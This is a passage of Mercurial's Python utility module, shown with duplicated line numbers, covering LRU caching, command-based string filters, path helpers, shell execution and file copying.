565 cache[args] = func(*args)
565 cache[args] = func(*args)
566 return cache[args]
566 return cache[args]
567
567
568 return f
568 return f
569
569
570 class sortdict(collections.OrderedDict):
570 class sortdict(collections.OrderedDict):
571 '''a simple sorted dictionary
571 '''a simple sorted dictionary
572
572
573 >>> d1 = sortdict([('a', 0), ('b', 1)])
573 >>> d1 = sortdict([('a', 0), ('b', 1)])
574 >>> d2 = d1.copy()
574 >>> d2 = d1.copy()
575 >>> d2
575 >>> d2
576 sortdict([('a', 0), ('b', 1)])
576 sortdict([('a', 0), ('b', 1)])
577 >>> d2.update([('a', 2)])
577 >>> d2.update([('a', 2)])
578 >>> d2.keys() # should still be in last-set order
578 >>> d2.keys() # should still be in last-set order
579 ['b', 'a']
579 ['b', 'a']
580 '''
580 '''
581
581
582 def __setitem__(self, key, value):
582 def __setitem__(self, key, value):
583 if key in self:
583 if key in self:
584 del self[key]
584 del self[key]
585 super(sortdict, self).__setitem__(key, value)
585 super(sortdict, self).__setitem__(key, value)
586
586
587 if pycompat.ispypy:
587 if pycompat.ispypy:
588 # __setitem__() isn't called as of PyPy 5.8.0
588 # __setitem__() isn't called as of PyPy 5.8.0
589 def update(self, src):
589 def update(self, src):
590 if isinstance(src, dict):
590 if isinstance(src, dict):
591 src = src.iteritems()
591 src = src.iteritems()
592 for k, v in src:
592 for k, v in src:
593 self[k] = v
593 self[k] = v
594
594
595 @contextlib.contextmanager
595 @contextlib.contextmanager
596 def acceptintervention(tr=None):
596 def acceptintervention(tr=None):
597 """A context manager that closes the transaction on InterventionRequired
597 """A context manager that closes the transaction on InterventionRequired
598
598
599 If no transaction was provided, this simply runs the body and returns
599 If no transaction was provided, this simply runs the body and returns
600 """
600 """
601 if not tr:
601 if not tr:
602 yield
602 yield
603 return
603 return
604 try:
604 try:
605 yield
605 yield
606 tr.close()
606 tr.close()
607 except error.InterventionRequired:
607 except error.InterventionRequired:
608 tr.close()
608 tr.close()
609 raise
609 raise
610 finally:
610 finally:
611 tr.release()
611 tr.release()
612
612
613 class _lrucachenode(object):
613 class _lrucachenode(object):
614 """A node in a doubly linked list.
614 """A node in a doubly linked list.
615
615
616 Holds a reference to nodes on either side as well as a key-value
616 Holds a reference to nodes on either side as well as a key-value
617 pair for the dictionary entry.
617 pair for the dictionary entry.
618 """
618 """
619 __slots__ = (u'next', u'prev', u'key', u'value')
619 __slots__ = (u'next', u'prev', u'key', u'value')
620
620
621 def __init__(self):
621 def __init__(self):
622 self.next = None
622 self.next = None
623 self.prev = None
623 self.prev = None
624
624
625 self.key = _notset
625 self.key = _notset
626 self.value = None
626 self.value = None
627
627
628 def markempty(self):
628 def markempty(self):
629 """Mark the node as emptied."""
629 """Mark the node as emptied."""
630 self.key = _notset
630 self.key = _notset
631
631
632 class lrucachedict(object):
632 class lrucachedict(object):
633 """Dict that caches most recent accesses and sets.
633 """Dict that caches most recent accesses and sets.
634
634
635 The dict consists of an actual backing dict - indexed by original
635 The dict consists of an actual backing dict - indexed by original
636 key - and a doubly linked circular list defining the order of entries in
636 key - and a doubly linked circular list defining the order of entries in
637 the cache.
637 the cache.
638
638
639 The head node is the newest entry in the cache. If the cache is full,
639 The head node is the newest entry in the cache. If the cache is full,
640 we recycle head.prev and make it the new head. Cache accesses result in
640 we recycle head.prev and make it the new head. Cache accesses result in
641 the node being moved to before the existing head and being marked as the
641 the node being moved to before the existing head and being marked as the
642 new head node.
642 new head node.
643 """
643 """
644 def __init__(self, max):
644 def __init__(self, max):
645 self._cache = {}
645 self._cache = {}
646
646
647 self._head = head = _lrucachenode()
647 self._head = head = _lrucachenode()
648 head.prev = head
648 head.prev = head
649 head.next = head
649 head.next = head
650 self._size = 1
650 self._size = 1
651 self._capacity = max
651 self._capacity = max
652
652
653 def __len__(self):
653 def __len__(self):
654 return len(self._cache)
654 return len(self._cache)
655
655
656 def __contains__(self, k):
656 def __contains__(self, k):
657 return k in self._cache
657 return k in self._cache
658
658
659 def __iter__(self):
659 def __iter__(self):
660 # We don't have to iterate in cache order, but why not.
660 # We don't have to iterate in cache order, but why not.
661 n = self._head
661 n = self._head
662 for i in range(len(self._cache)):
662 for i in range(len(self._cache)):
663 yield n.key
663 yield n.key
664 n = n.next
664 n = n.next
665
665
666 def __getitem__(self, k):
666 def __getitem__(self, k):
667 node = self._cache[k]
667 node = self._cache[k]
668 self._movetohead(node)
668 self._movetohead(node)
669 return node.value
669 return node.value
670
670
671 def __setitem__(self, k, v):
671 def __setitem__(self, k, v):
672 node = self._cache.get(k)
672 node = self._cache.get(k)
673 # Replace existing value and mark as newest.
673 # Replace existing value and mark as newest.
674 if node is not None:
674 if node is not None:
675 node.value = v
675 node.value = v
676 self._movetohead(node)
676 self._movetohead(node)
677 return
677 return
678
678
679 if self._size < self._capacity:
679 if self._size < self._capacity:
680 node = self._addcapacity()
680 node = self._addcapacity()
681 else:
681 else:
682 # Grab the last/oldest item.
682 # Grab the last/oldest item.
683 node = self._head.prev
683 node = self._head.prev
684
684
685 # At capacity. Kill the old entry.
685 # At capacity. Kill the old entry.
686 if node.key is not _notset:
686 if node.key is not _notset:
687 del self._cache[node.key]
687 del self._cache[node.key]
688
688
689 node.key = k
689 node.key = k
690 node.value = v
690 node.value = v
691 self._cache[k] = node
691 self._cache[k] = node
692 # And mark it as newest entry. No need to adjust order since it
692 # And mark it as newest entry. No need to adjust order since it
693 # is already self._head.prev.
693 # is already self._head.prev.
694 self._head = node
694 self._head = node
695
695
696 def __delitem__(self, k):
696 def __delitem__(self, k):
697 node = self._cache.pop(k)
697 node = self._cache.pop(k)
698 node.markempty()
698 node.markempty()
699
699
700 # Temporarily mark as newest item before re-adjusting head to make
700 # Temporarily mark as newest item before re-adjusting head to make
701 # this node the oldest item.
701 # this node the oldest item.
702 self._movetohead(node)
702 self._movetohead(node)
703 self._head = node.next
703 self._head = node.next
704
704
705 # Additional dict methods.
705 # Additional dict methods.
706
706
707 def get(self, k, default=None):
707 def get(self, k, default=None):
708 try:
708 try:
709 return self._cache[k].value
709 return self._cache[k].value
710 except KeyError:
710 except KeyError:
711 return default
711 return default
712
712
713 def clear(self):
713 def clear(self):
714 n = self._head
714 n = self._head
715 while n.key is not _notset:
715 while n.key is not _notset:
716 n.markempty()
716 n.markempty()
717 n = n.next
717 n = n.next
718
718
719 self._cache.clear()
719 self._cache.clear()
720
720
721 def copy(self):
721 def copy(self):
722 result = lrucachedict(self._capacity)
722 result = lrucachedict(self._capacity)
723 n = self._head.prev
723 n = self._head.prev
724 # Iterate in oldest-to-newest order, so the copy has the right ordering
724 # Iterate in oldest-to-newest order, so the copy has the right ordering
725 for i in range(len(self._cache)):
725 for i in range(len(self._cache)):
726 result[n.key] = n.value
726 result[n.key] = n.value
727 n = n.prev
727 n = n.prev
728 return result
728 return result
729
729
730 def _movetohead(self, node):
730 def _movetohead(self, node):
731 """Mark a node as the newest, making it the new head.
731 """Mark a node as the newest, making it the new head.
732
732
733 When a node is accessed, it becomes the freshest entry in the LRU
733 When a node is accessed, it becomes the freshest entry in the LRU
734 list, which is denoted by self._head.
734 list, which is denoted by self._head.
735
735
736 Visually, let's make ``N`` the new head node (* denotes head):
736 Visually, let's make ``N`` the new head node (* denotes head):
737
737
738 previous/oldest <-> head <-> next/next newest
738 previous/oldest <-> head <-> next/next newest
739
739
740 ----<->--- A* ---<->-----
740 ----<->--- A* ---<->-----
741 | |
741 | |
742 E <-> D <-> N <-> C <-> B
742 E <-> D <-> N <-> C <-> B
743
743
744 To:
744 To:
745
745
746 ----<->--- N* ---<->-----
746 ----<->--- N* ---<->-----
747 | |
747 | |
748 E <-> D <-> C <-> B <-> A
748 E <-> D <-> C <-> B <-> A
749
749
750 This requires the following moves:
750 This requires the following moves:
751
751
752 C.next = D (node.prev.next = node.next)
752 C.next = D (node.prev.next = node.next)
753 D.prev = C (node.next.prev = node.prev)
753 D.prev = C (node.next.prev = node.prev)
754 E.next = N (head.prev.next = node)
754 E.next = N (head.prev.next = node)
755 N.prev = E (node.prev = head.prev)
755 N.prev = E (node.prev = head.prev)
756 N.next = A (node.next = head)
756 N.next = A (node.next = head)
757 A.prev = N (head.prev = node)
757 A.prev = N (head.prev = node)
758 """
758 """
759 head = self._head
759 head = self._head
760 # C.next = D
760 # C.next = D
761 node.prev.next = node.next
761 node.prev.next = node.next
762 # D.prev = C
762 # D.prev = C
763 node.next.prev = node.prev
763 node.next.prev = node.prev
764 # N.prev = E
764 # N.prev = E
765 node.prev = head.prev
765 node.prev = head.prev
766 # N.next = A
766 # N.next = A
767 # It is tempting to do just "head" here, however if node is
767 # It is tempting to do just "head" here, however if node is
768 # adjacent to head, this will do bad things.
768 # adjacent to head, this will do bad things.
769 node.next = head.prev.next
769 node.next = head.prev.next
770 # E.next = N
770 # E.next = N
771 node.next.prev = node
771 node.next.prev = node
772 # A.prev = N
772 # A.prev = N
773 node.prev.next = node
773 node.prev.next = node
774
774
775 self._head = node
775 self._head = node
776
776
777 def _addcapacity(self):
777 def _addcapacity(self):
778 """Add a node to the circular linked list.
778 """Add a node to the circular linked list.
779
779
780 The new node is inserted before the head node.
780 The new node is inserted before the head node.
781 """
781 """
782 head = self._head
782 head = self._head
783 node = _lrucachenode()
783 node = _lrucachenode()
784 head.prev.next = node
784 head.prev.next = node
785 node.prev = head.prev
785 node.prev = head.prev
786 node.next = head
786 node.next = head
787 head.prev = node
787 head.prev = node
788 self._size += 1
788 self._size += 1
789 return node
789 return node
790
790
791 def lrucachefunc(func):
791 def lrucachefunc(func):
792 '''cache most recent results of function calls'''
792 '''cache most recent results of function calls'''
793 cache = {}
793 cache = {}
794 order = collections.deque()
794 order = collections.deque()
795 if func.__code__.co_argcount == 1:
795 if func.__code__.co_argcount == 1:
796 def f(arg):
796 def f(arg):
797 if arg not in cache:
797 if arg not in cache:
798 if len(cache) > 20:
798 if len(cache) > 20:
799 del cache[order.popleft()]
799 del cache[order.popleft()]
800 cache[arg] = func(arg)
800 cache[arg] = func(arg)
801 else:
801 else:
802 order.remove(arg)
802 order.remove(arg)
803 order.append(arg)
803 order.append(arg)
804 return cache[arg]
804 return cache[arg]
805 else:
805 else:
806 def f(*args):
806 def f(*args):
807 if args not in cache:
807 if args not in cache:
808 if len(cache) > 20:
808 if len(cache) > 20:
809 del cache[order.popleft()]
809 del cache[order.popleft()]
810 cache[args] = func(*args)
810 cache[args] = func(*args)
811 else:
811 else:
812 order.remove(args)
812 order.remove(args)
813 order.append(args)
813 order.append(args)
814 return cache[args]
814 return cache[args]
815
815
816 return f
816 return f
817
817
818 class propertycache(object):
818 class propertycache(object):
819 def __init__(self, func):
819 def __init__(self, func):
820 self.func = func
820 self.func = func
821 self.name = func.__name__
821 self.name = func.__name__
822 def __get__(self, obj, type=None):
822 def __get__(self, obj, type=None):
823 result = self.func(obj)
823 result = self.func(obj)
824 self.cachevalue(obj, result)
824 self.cachevalue(obj, result)
825 return result
825 return result
826
826
827 def cachevalue(self, obj, value):
827 def cachevalue(self, obj, value):
828 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
828 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
829 obj.__dict__[self.name] = value
829 obj.__dict__[self.name] = value
830
830
831 def pipefilter(s, cmd):
831 def pipefilter(s, cmd):
832 '''filter string S through command CMD, returning its output'''
832 '''filter string S through command CMD, returning its output'''
833 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
833 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
834 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
834 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
835 pout, perr = p.communicate(s)
835 pout, perr = p.communicate(s)
836 return pout
836 return pout
837
837
838 def tempfilter(s, cmd):
838 def tempfilter(s, cmd):
839 '''filter string S through a pair of temporary files with CMD.
839 '''filter string S through a pair of temporary files with CMD.
840 CMD is used as a template to create the real command to be run,
840 CMD is used as a template to create the real command to be run,
841 with the strings INFILE and OUTFILE replaced by the real names of
841 with the strings INFILE and OUTFILE replaced by the real names of
842 the temporary files generated.'''
842 the temporary files generated.'''
843 inname, outname = None, None
843 inname, outname = None, None
844 try:
844 try:
845 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
845 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
846 fp = os.fdopen(infd, pycompat.sysstr('wb'))
846 fp = os.fdopen(infd, pycompat.sysstr('wb'))
847 fp.write(s)
847 fp.write(s)
848 fp.close()
848 fp.close()
849 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
849 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
850 os.close(outfd)
850 os.close(outfd)
851 cmd = cmd.replace('INFILE', inname)
851 cmd = cmd.replace('INFILE', inname)
852 cmd = cmd.replace('OUTFILE', outname)
852 cmd = cmd.replace('OUTFILE', outname)
853 code = os.system(cmd)
853 code = os.system(cmd)
854 if pycompat.sysplatform == 'OpenVMS' and code & 1:
854 if pycompat.sysplatform == 'OpenVMS' and code & 1:
855 code = 0
855 code = 0
856 if code:
856 if code:
857 raise Abort(_("command '%s' failed: %s") %
857 raise Abort(_("command '%s' failed: %s") %
858 (cmd, explainexit(code)))
858 (cmd, explainexit(code)))
859 return readfile(outname)
859 return readfile(outname)
860 finally:
860 finally:
861 try:
861 try:
862 if inname:
862 if inname:
863 os.unlink(inname)
863 os.unlink(inname)
864 except OSError:
864 except OSError:
865 pass
865 pass
866 try:
866 try:
867 if outname:
867 if outname:
868 os.unlink(outname)
868 os.unlink(outname)
869 except OSError:
869 except OSError:
870 pass
870 pass
871
871
872 filtertable = {
872 filtertable = {
873 'tempfile:': tempfilter,
873 'tempfile:': tempfilter,
874 'pipe:': pipefilter,
874 'pipe:': pipefilter,
875 }
875 }
876
876
877 def filter(s, cmd):
877 def filter(s, cmd):
878 "filter a string through a command that transforms its input to its output"
878 "filter a string through a command that transforms its input to its output"
879 for name, fn in filtertable.iteritems():
879 for name, fn in filtertable.iteritems():
880 if cmd.startswith(name):
880 if cmd.startswith(name):
881 return fn(s, cmd[len(name):].lstrip())
881 return fn(s, cmd[len(name):].lstrip())
882 return pipefilter(s, cmd)
882 return pipefilter(s, cmd)
883
883
884 def binary(s):
884 def binary(s):
885 """return true if a string is binary data"""
885 """return true if a string is binary data"""
886 return bool(s and '\0' in s)
886 return bool(s and '\0' in s)
887
887
888 def increasingchunks(source, min=1024, max=65536):
888 def increasingchunks(source, min=1024, max=65536):
889 '''return no less than min bytes per chunk while data remains,
889 '''return no less than min bytes per chunk while data remains,
890 doubling min after each chunk until it reaches max'''
890 doubling min after each chunk until it reaches max'''
891 def log2(x):
891 def log2(x):
892 if not x:
892 if not x:
893 return 0
893 return 0
894 i = 0
894 i = 0
895 while x:
895 while x:
896 x >>= 1
896 x >>= 1
897 i += 1
897 i += 1
898 return i - 1
898 return i - 1
899
899
900 buf = []
900 buf = []
901 blen = 0
901 blen = 0
902 for chunk in source:
902 for chunk in source:
903 buf.append(chunk)
903 buf.append(chunk)
904 blen += len(chunk)
904 blen += len(chunk)
905 if blen >= min:
905 if blen >= min:
906 if min < max:
906 if min < max:
907 min = min << 1
907 min = min << 1
908 nmin = 1 << log2(blen)
908 nmin = 1 << log2(blen)
909 if nmin > min:
909 if nmin > min:
910 min = nmin
910 min = nmin
911 if min > max:
911 if min > max:
912 min = max
912 min = max
913 yield ''.join(buf)
913 yield ''.join(buf)
914 blen = 0
914 blen = 0
915 buf = []
915 buf = []
916 if buf:
916 if buf:
917 yield ''.join(buf)
917 yield ''.join(buf)
918
918
919 Abort = error.Abort
919 Abort = error.Abort
920
920
921 def always(fn):
921 def always(fn):
922 return True
922 return True
923
923
924 def never(fn):
924 def never(fn):
925 return False
925 return False
926
926
927 def nogc(func):
927 def nogc(func):
928 """disable garbage collector
928 """disable garbage collector
929
929
930 Python's garbage collector triggers a GC each time a certain number of
930 Python's garbage collector triggers a GC each time a certain number of
931 container objects (the number being defined by gc.get_threshold()) are
931 container objects (the number being defined by gc.get_threshold()) are
932 allocated even when marked not to be tracked by the collector. Tracking has
932 allocated even when marked not to be tracked by the collector. Tracking has
933 no effect on when GCs are triggered, only on what objects the GC looks
933 no effect on when GCs are triggered, only on what objects the GC looks
934 into. As a workaround, disable GC while building complex (huge)
934 into. As a workaround, disable GC while building complex (huge)
935 containers.
935 containers.
936
936
937 This garbage collector issue have been fixed in 2.7.
937 This garbage collector issue have been fixed in 2.7.
938 """
938 """
939 if sys.version_info >= (2, 7):
939 if sys.version_info >= (2, 7):
940 return func
940 return func
941 def wrapper(*args, **kwargs):
941 def wrapper(*args, **kwargs):
942 gcenabled = gc.isenabled()
942 gcenabled = gc.isenabled()
943 gc.disable()
943 gc.disable()
944 try:
944 try:
945 return func(*args, **kwargs)
945 return func(*args, **kwargs)
946 finally:
946 finally:
947 if gcenabled:
947 if gcenabled:
948 gc.enable()
948 gc.enable()
949 return wrapper
949 return wrapper
950
950
951 def pathto(root, n1, n2):
951 def pathto(root, n1, n2):
952 '''return the relative path from one place to another.
952 '''return the relative path from one place to another.
953 root should use os.sep to separate directories
953 root should use os.sep to separate directories
954 n1 should use os.sep to separate directories
954 n1 should use os.sep to separate directories
955 n2 should use "/" to separate directories
955 n2 should use "/" to separate directories
956 returns an os.sep-separated path.
956 returns an os.sep-separated path.
957
957
958 If n1 is a relative path, it's assumed it's
958 If n1 is a relative path, it's assumed it's
959 relative to root.
959 relative to root.
960 n2 should always be relative to root.
960 n2 should always be relative to root.
961 '''
961 '''
962 if not n1:
962 if not n1:
963 return localpath(n2)
963 return localpath(n2)
964 if os.path.isabs(n1):
964 if os.path.isabs(n1):
965 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
965 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
966 return os.path.join(root, localpath(n2))
966 return os.path.join(root, localpath(n2))
967 n2 = '/'.join((pconvert(root), n2))
967 n2 = '/'.join((pconvert(root), n2))
968 a, b = splitpath(n1), n2.split('/')
968 a, b = splitpath(n1), n2.split('/')
969 a.reverse()
969 a.reverse()
970 b.reverse()
970 b.reverse()
971 while a and b and a[-1] == b[-1]:
971 while a and b and a[-1] == b[-1]:
972 a.pop()
972 a.pop()
973 b.pop()
973 b.pop()
974 b.reverse()
974 b.reverse()
975 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
975 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
976
976
977 def mainfrozen():
977 def mainfrozen():
978 """return True if we are a frozen executable.
978 """return True if we are a frozen executable.
979
979
980 The code supports py2exe (most common, Windows only) and tools/freeze
980 The code supports py2exe (most common, Windows only) and tools/freeze
981 (portable, not much used).
981 (portable, not much used).
982 """
982 """
983 return (safehasattr(sys, "frozen") or # new py2exe
983 return (safehasattr(sys, "frozen") or # new py2exe
984 safehasattr(sys, "importers") or # old py2exe
984 safehasattr(sys, "importers") or # old py2exe
985 imp.is_frozen(u"__main__")) # tools/freeze
985 imp.is_frozen(u"__main__")) # tools/freeze
986
986
987 # the location of data files matching the source code
987 # the location of data files matching the source code
988 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
988 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
989 # executable version (py2exe) doesn't support __file__
989 # executable version (py2exe) doesn't support __file__
990 datapath = os.path.dirname(pycompat.sysexecutable)
990 datapath = os.path.dirname(pycompat.sysexecutable)
991 else:
991 else:
992 datapath = os.path.dirname(pycompat.fsencode(__file__))
992 datapath = os.path.dirname(pycompat.fsencode(__file__))
993
993
994 i18n.setdatapath(datapath)
994 i18n.setdatapath(datapath)
995
995
996 _hgexecutable = None
996 _hgexecutable = None
997
997
998 def hgexecutable():
998 def hgexecutable():
999 """return location of the 'hg' executable.
999 """return location of the 'hg' executable.
1000
1000
1001 Defaults to $HG or 'hg' in the search path.
1001 Defaults to $HG or 'hg' in the search path.
1002 """
1002 """
1003 if _hgexecutable is None:
1003 if _hgexecutable is None:
1004 hg = encoding.environ.get('HG')
1004 hg = encoding.environ.get('HG')
1005 mainmod = sys.modules[pycompat.sysstr('__main__')]
1005 mainmod = sys.modules[pycompat.sysstr('__main__')]
1006 if hg:
1006 if hg:
1007 _sethgexecutable(hg)
1007 _sethgexecutable(hg)
1008 elif mainfrozen():
1008 elif mainfrozen():
1009 if getattr(sys, 'frozen', None) == 'macosx_app':
1009 if getattr(sys, 'frozen', None) == 'macosx_app':
1010 # Env variable set by py2app
1010 # Env variable set by py2app
1011 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1011 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1012 else:
1012 else:
1013 _sethgexecutable(pycompat.sysexecutable)
1013 _sethgexecutable(pycompat.sysexecutable)
1014 elif (os.path.basename(
1014 elif (os.path.basename(
1015 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1015 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1016 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1016 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1017 else:
1017 else:
1018 exe = findexe('hg') or os.path.basename(sys.argv[0])
1018 exe = findexe('hg') or os.path.basename(sys.argv[0])
1019 _sethgexecutable(exe)
1019 _sethgexecutable(exe)
1020 return _hgexecutable
1020 return _hgexecutable
1021
1021
1022 def _sethgexecutable(path):
1022 def _sethgexecutable(path):
1023 """set location of the 'hg' executable"""
1023 """set location of the 'hg' executable"""
1024 global _hgexecutable
1024 global _hgexecutable
1025 _hgexecutable = path
1025 _hgexecutable = path
1026
1026
1027 def _isstdout(f):
1027 def _isstdout(f):
1028 fileno = getattr(f, 'fileno', None)
1028 fileno = getattr(f, 'fileno', None)
1029 return fileno and fileno() == sys.__stdout__.fileno()
1029 return fileno and fileno() == sys.__stdout__.fileno()
1030
1030
1031 def shellenviron(environ=None):
1031 def shellenviron(environ=None):
1032 """return environ with optional override, useful for shelling out"""
1032 """return environ with optional override, useful for shelling out"""
1033 def py2shell(val):
1033 def py2shell(val):
1034 'convert python object into string that is useful to shell'
1034 'convert python object into string that is useful to shell'
1035 if val is None or val is False:
1035 if val is None or val is False:
1036 return '0'
1036 return '0'
1037 if val is True:
1037 if val is True:
1038 return '1'
1038 return '1'
1039 return str(val)
1039 return str(val)
1040 env = dict(encoding.environ)
1040 env = dict(encoding.environ)
1041 if environ:
1041 if environ:
1042 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1042 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1043 env['HG'] = hgexecutable()
1043 env['HG'] = hgexecutable()
1044 return env
1044 return env
1045
1045
1046 def system(cmd, environ=None, cwd=None, out=None):
1046 def system(cmd, environ=None, cwd=None, out=None):
1047 '''enhanced shell command execution.
1047 '''enhanced shell command execution.
1048 run with environment maybe modified, maybe in different dir.
1048 run with environment maybe modified, maybe in different dir.
1049
1049
1050 if out is specified, it is assumed to be a file-like object that has a
1050 if out is specified, it is assumed to be a file-like object that has a
1051 write() method. stdout and stderr will be redirected to out.'''
1051 write() method. stdout and stderr will be redirected to out.'''
1052 try:
1052 try:
1053 stdout.flush()
1053 stdout.flush()
1054 except Exception:
1054 except Exception:
1055 pass
1055 pass
1056 cmd = quotecommand(cmd)
1056 cmd = quotecommand(cmd)
1057 env = shellenviron(environ)
1057 env = shellenviron(environ)
1058 if out is None or _isstdout(out):
1058 if out is None or _isstdout(out):
1059 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1059 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1060 env=env, cwd=cwd)
1060 env=env, cwd=cwd)
1061 else:
1061 else:
1062 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1062 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1063 env=env, cwd=cwd, stdout=subprocess.PIPE,
1063 env=env, cwd=cwd, stdout=subprocess.PIPE,
1064 stderr=subprocess.STDOUT)
1064 stderr=subprocess.STDOUT)
1065 for line in iter(proc.stdout.readline, ''):
1065 for line in iter(proc.stdout.readline, ''):
1066 out.write(line)
1066 out.write(line)
1067 proc.wait()
1067 proc.wait()
1068 rc = proc.returncode
1068 rc = proc.returncode
1069 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1069 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1070 rc = 0
1070 rc = 0
1071 return rc
1071 return rc
1072
1072
1073 def checksignature(func):
1073 def checksignature(func):
1074 '''wrap a function with code to check for calling errors'''
1074 '''wrap a function with code to check for calling errors'''
1075 def check(*args, **kwargs):
1075 def check(*args, **kwargs):
1076 try:
1076 try:
1077 return func(*args, **kwargs)
1077 return func(*args, **kwargs)
1078 except TypeError:
1078 except TypeError:
1079 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1079 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1080 raise error.SignatureError
1080 raise error.SignatureError
1081 raise
1081 raise
1082
1082
1083 return check
1083 return check
1084
1084
1085 # a whilelist of known filesystems where hardlink works reliably
1085 # a whilelist of known filesystems where hardlink works reliably
1086 _hardlinkfswhitelist = {
1086 _hardlinkfswhitelist = {
1087 'btrfs',
1087 'btrfs',
1088 'ext2',
1088 'ext2',
1089 'ext3',
1089 'ext3',
1090 'ext4',
1090 'ext4',
1091 'hfs',
1091 'hfs',
1092 'jfs',
1092 'jfs',
1093 'reiserfs',
1093 'reiserfs',
1094 'tmpfs',
1094 'tmpfs',
1095 'ufs',
1095 'ufs',
1096 'xfs',
1096 'xfs',
1097 'zfs',
1097 'zfs',
1098 }
1098 }
1099
1099
1100 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1100 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1101 '''copy a file, preserving mode and optionally other stat info like
1101 '''copy a file, preserving mode and optionally other stat info like
1102 atime/mtime
1102 atime/mtime
1103
1103
1104 checkambig argument is used with filestat, and is useful only if
1104 checkambig argument is used with filestat, and is useful only if
1105 destination file is guarded by any lock (e.g. repo.lock or
1105 destination file is guarded by any lock (e.g. repo.lock or
1106 repo.wlock).
1106 repo.wlock).
1107
1107
1108 copystat and checkambig should be exclusive.
1108 copystat and checkambig should be exclusive.
1109 '''
1109 '''
1110 assert not (copystat and checkambig)
1110 assert not (copystat and checkambig)
1111 oldstat = None
1111 oldstat = None
1112 if os.path.lexists(dest):
1112 if os.path.lexists(dest):
1113 if checkambig:
1113 if checkambig:
1114 oldstat = checkambig and filestat.frompath(dest)
1114 oldstat = checkambig and filestat.frompath(dest)
1115 unlink(dest)
1115 unlink(dest)
1116 if hardlink:
1116 if hardlink:
1117 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1117 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1118 # unless we are confident that dest is on a whitelisted filesystem.
1118 # unless we are confident that dest is on a whitelisted filesystem.
1119 try:
1119 try:
1120 fstype = getfstype(os.path.dirname(dest))
1120 fstype = getfstype(os.path.dirname(dest))
1121 except OSError:
1121 except OSError:
1122 fstype = None
1122 fstype = None
1123 if fstype not in _hardlinkfswhitelist:
1123 if fstype not in _hardlinkfswhitelist:
1124 hardlink = False
1124 hardlink = False
1125 if hardlink:
1125 if hardlink:
1126 try:
1126 try:
1127 oslink(src, dest)
1127 oslink(src, dest)
1128 return
1128 return
1129 except (IOError, OSError):
1129 except (IOError, OSError):
1130 pass # fall back to normal copy
1130 pass # fall back to normal copy
1131 if os.path.islink(src):
1131 if os.path.islink(src):
1132 os.symlink(os.readlink(src), dest)
1132 os.symlink(os.readlink(src), dest)
1133 # copytime is ignored for symlinks, but in general copytime isn't needed
1133 # copytime is ignored for symlinks, but in general copytime isn't needed
1134 # for them anyway
1134 # for them anyway
1135 else:
1135 else:
1136 try:
1136 try:
1137 shutil.copyfile(src, dest)
1137 shutil.copyfile(src, dest)
1138 if copystat:
1138 if copystat:
1139 # copystat also copies mode
1139 # copystat also copies mode
1140 shutil.copystat(src, dest)
1140 shutil.copystat(src, dest)
1141 else:
1141 else:
1142 shutil.copymode(src, dest)
1142 shutil.copymode(src, dest)
1143 if oldstat and oldstat.stat:
1143 if oldstat and oldstat.stat:
1144 newstat = filestat.frompath(dest)
1144 newstat = filestat.frompath(dest)
1145 if newstat.isambig(oldstat):
1145 if newstat.isambig(oldstat):
1146 # stat of copied file is ambiguous to original one
1146 # stat of copied file is ambiguous to original one
1147 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1147 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1148 os.utime(dest, (advanced, advanced))
1148 os.utime(dest, (advanced, advanced))
1149 except shutil.Error as inst:
1149 except shutil.Error as inst:
1150 raise Abort(str(inst))
1150 raise Abort(str(inst))
1151
1151
1152 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1152 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1153 """Copy a directory tree using hardlinks if possible."""
1153 """Copy a directory tree using hardlinks if possible."""
1154 num = 0
1154 num = 0
1155
1155
1156 gettopic = lambda: hardlink and _('linking') or _('copying')
1156 gettopic = lambda: hardlink and _('linking') or _('copying')
1157
1157
1158 if os.path.isdir(src):
1158 if os.path.isdir(src):
1159 if hardlink is None:
1159 if hardlink is None:
1160 hardlink = (os.stat(src).st_dev ==
1160 hardlink = (os.stat(src).st_dev ==
1161 os.stat(os.path.dirname(dst)).st_dev)
1161 os.stat(os.path.dirname(dst)).st_dev)
1162 topic = gettopic()
1162 topic = gettopic()
1163 os.mkdir(dst)
1163 os.mkdir(dst)
1164 for name, kind in listdir(src):
1164 for name, kind in listdir(src):
1165 srcname = os.path.join(src, name)
1165 srcname = os.path.join(src, name)
1166 dstname = os.path.join(dst, name)
1166 dstname = os.path.join(dst, name)
